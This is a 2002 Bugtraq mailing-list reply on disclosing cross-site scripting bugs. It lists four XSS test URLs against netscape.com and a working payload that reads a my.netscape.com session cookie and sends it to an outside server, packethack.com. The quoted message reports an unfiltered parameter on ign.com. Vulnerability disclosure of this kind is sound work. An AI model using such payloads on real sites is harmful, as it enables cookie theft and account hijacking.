Bugtraq mailing list archives

Re: CSS -> ign.com

From: Blake Frantz <blake () mc net>
Date: Wed, 6 Feb 2002 22:30:08 -0600 (CST)



I think it's important to notify the public about CSS vulnerabilities when
a certain threshhold of severity is reached.  Who decides what is severe?
That probably falls in the lap of the list moderator. I've found quite a
few of these vulnerabilites but most of them are, in my mind,
insignificant.  Most of the sites I have found vulnerabilities in don't
store anything sensitive in cookies, arn't used as a public forum (message
board), don't authenticate users, or they simply arn't "main stream"
enough.  In these cases it's enough to send the admins of such domains an
email and move on. 

With this in mind, a few weeks ago I found four CSS vulnerabilities in
netscape.com:

http://pfquotes.netscape.com/finance/quotes/quotes.tmpl?symbol=&apos;);alert('test
http://search.netscape.com/search.psp?search=";><script>alert('test')</script>
http://yp.netscape.com/setlocation.adp?addressloc=";><script>alert('test')</script>
http://webcenter.newssearch.netscape.com/aolns_search.adp?query=";><script>alert('test')</script>

and constructed a URL that demonstrates theft of my.netscape.com cookies.

Set up a my.netscape.com account, then go here:

<IMPORTANT NOTE>
This will send the contents of your cookie to packethack.com simply to
display the contents of your cookie and to demonstrate how cookies can be
sent to remote servers.
</IMPORTANT NOTE>

http://search.netscape.com/search.psp?search=";><script>function gcv(os){var 
endstr=document.cookie.indexOf("/",os);if(endstr==-1)endstr=document.cookie.length;return 
unescape(document.cookie.substring(os,endstr));}function gc(n){var arg=n%2B"=";var alen=arg.length;var 
clen=document.cookie.length;var i=0;while(i<clen){var j=i%2Balen;if(document.cookie.substring(i,j)==arg)return 
gcv(j);i=document.cookie.indexOf(" ",i)%2B1;if(i==0)break;}return 
null;}window.document.location.href="http://www.packethack.com/cgi-bin/css_snarf.pl?val="%2Bgc('NSCPHPAD1');</script>

I have noticed that the cookie name occasionally changes from NSCPHPAD1 so
you may need to play with that.

Netscape was contacted about this awhile ago but I never recieved a
response.  Now, is this important enough to send to bugtraq?  I guess I'll
find out in the AM.

-Blake

 On Tue, 5 Feb 2002, [iso-8859-1] Knud Erik H?jgaard wrote:

To add to the late plethora of CSS bugs, ign.com has some too. 

'Vendor' contacted about a week ago at various mailaddresses, no reply.

visiting 
http://mediaviewer.ign.com/mediaPage.jsp?object_id=15984&media_type=P&ign_section=17&adtag=network%3Dign%26site%3Dps2viewer%26adchannel%3Dps2%26pagetype%3Darticle&page_title=knud+fighter+4
 

will show you some screenshots from 'knud fighter 4' (really virtua fighter 4 shots).. the &page_title=blabla doesn't 
filter <tags> so it's possible to steal cookies and whatnot.. I haven't tried in the members section, since i can't 
really access it without an account, but i assume it uses the same files since ps2.ign.com/pc.ign.com/pocket.ign.com 
all utilize mediaviewer.ign.com/mediaPage.jsp for their media (p)reviews.

random thought: is bugtraq really the correct place for css bugs? many vulnerable scripts are 'homemade' .. so it's 
not like there's much value in reporting 'site x has css bug in blah.php' ..

-Knud

Current thread:

CSS -> ign.com Knud Erik Højgaard (Feb 06)
- Re: CSS -> ign.com Blake Frantz (Feb 07)
- Re: CSS -> ign.com Steven Champeon (Feb 07)